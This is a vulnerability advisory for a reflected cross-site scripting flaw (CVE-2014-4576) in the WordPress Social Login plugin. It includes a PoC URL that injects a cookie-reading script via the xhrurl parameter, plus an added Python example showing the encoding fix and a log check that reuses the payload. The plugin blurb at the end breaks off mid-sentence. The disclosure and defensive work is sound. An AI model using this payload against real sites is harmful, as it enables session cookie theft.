wp-plugin : wordpress-social-login – A3-Cross-Site Scripting (XSS)

Plugin Details

Plugin Name : wordpress-social-login

Affected Version : 2.0.3 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Prajal Kulkarni

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/wordpresssociallogin/services/diagnostics.php?xhrurl=xhrurl%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
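The PoC above works because the `xhrurl` query parameter is reflected into the diagnostics page without output encoding. The following is an added example, not code from the plugin or from the advisory: it models the flawed reflection in miniature, shows the attribute-encoding fix, and applies a simple access-log check for requests shaped like the PoC. The assumption that the parameter lands inside a single-quoted HTML attribute is mine (suggested by the `'>` prefix of the payload), and the template strings and log lines are constructed for the example.

```python
"""
Added example, not the plugin's code: a miniature of the reflected-XSS pattern
behind CVE-2014-4576 in diagnostics.php, the output-encoding fix, and a log
check for the published PoC shape.

Assumption (not stated on the page): the `xhrurl` query parameter is reflected
into a single-quoted HTML attribute. Templates and log lines are constructed.
"""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Query string from the advisory's PoC URL (copied as published).
POC_QUERY = ("xhrurl=xhrurl%27%3E%3Cscript%3Ealert%28document.cookie%29"
             "%3C/script%3E&")


def xhrurl_from_query(query: str) -> str:
    """Decode the xhrurl parameter the way PHP's $_GET would hand it to the script."""
    return parse_qs(query, keep_blank_values=True).get("xhrurl", [""])[0]


def render_vulnerable(xhrurl: str) -> str:
    """Hypothetical flawed template: the raw parameter lands inside an attribute."""
    return f"<input type='text' name='xhrurl' value='{xhrurl}'>"


def render_fixed(xhrurl: str) -> str:
    """Same template with attribute encoding; in WordPress esc_attr() fills this role."""
    return f"<input type='text' name='xhrurl' value='{escape(xhrurl, quote=True)}'>"


class _StartTags(HTMLParser):
    """Collects start-tag names so we can ask what a browser would actually parse."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_script(html: str) -> bool:
    """True when the rendered markup contains a real <script> element."""
    parser = _StartTags()
    parser.feed(html)
    parser.close()
    return "script" in parser.tags


# Detection side: the PoC targets services/diagnostics.php with markup in xhrurl.
_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_xhrurl(request_target: str) -> bool:
    """Flag a request target whose decoded xhrurl carries HTML metacharacters."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/services/diagnostics.php"):
        return False
    value = xhrurl_from_query(parts.query)
    return any(ch in value for ch in "<>'\"")


def flag_log_lines(lines: list) -> list:
    """Return the request targets from combined-format log lines that match."""
    hits = []
    for line in lines:
        m = _REQUEST_RE.search(line)
        if m and suspicious_xhrurl(m.group(1)):
            hits.append(m.group(1))
    return hits


# Constructed sample log lines: one benign diagnostics call, one PoC-shaped call.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Apr/2014:10:00:00 +0000] "GET /wordpress/wp-content/'
    'wp-plugs/wordpresssociallogin/services/diagnostics.php?xhrurl=https://'
    'example.com/cb HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Apr/2014:10:00:07 +0000] "GET /wordpress/wp-content/'
    'wp-plugs/wordpresssociallogin/services/diagnostics.php?' + POC_QUERY +
    ' HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    payload = xhrurl_from_query(POC_QUERY)
    print("vulnerable template yields a <script> element:", injected_script(render_vulnerable(payload)))
    print("fixed template yields a <script> element:     ", injected_script(render_fixed(payload)))
    print("flagged requests:", flag_log_lines(SAMPLE_LOG))
```

The fix is the usual one for reflected XSS in an attribute context: encode the value for that context at output time (`esc_attr()` in WordPress, `htmlspecialchars()` with `ENT_QUOTES` in plain PHP) rather than trying to filter the input. The log check is deliberately narrow (the diagnostics endpoint plus markup metacharacters in `xhrurl`) so that normal callback URLs in that parameter do not trigger it.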

 

Disclosure Timeline

Vendor Contacted : 2014-01-21

Plugin Status : Updated on 2014-01-11

Public Disclosure : April 25, 2014

CVE Number : CVE-2014-4576

Plugin Description :

Using WordPress Social Login, your blog's users will be able to log in and comment with social networks such as Twitter, Facebook, Google and Yahoo.

WordPress Social Login also allows you to import users' contact lists from Google Gmail, Facebook, Windows Live and LinkedIn.

WordPress Social Login gives you absolute control over users' access to your website and comes with a painfully long list of rules and restrictions for you to set up.

Free, unlimited and white-label

Licensed under the MIT License, WordPress Social Login is available to everyone completely free, with all features included, at absolutely no cost. You are free to use WordPress Social Login in commercial websites as long as the copyright header is left intact.

Built on top of an Open Source Library

The HybridAuth Library enables developers to easily build social applications that engage website visitors and customers on a social level by implementing social sign-in, social sharing, user profiles, friends lists, activity streams, status updates and more.

23 supported social networks

Depending on the audience you're targeting, you can choose from a wide variety of providers and services including: social networks, microblogging platforms, professional networks, media, photo sharing, and programmers' and gamers' networks.

Easy to customize and integrate

WordPress Social Login comes with a simple but flexible and fully customizable authentication widget. And if you are a developer or designer, you can customize it to your heart's content; changing the CSS and icons is a matter of seconds.

Even more features are planned

The coming release
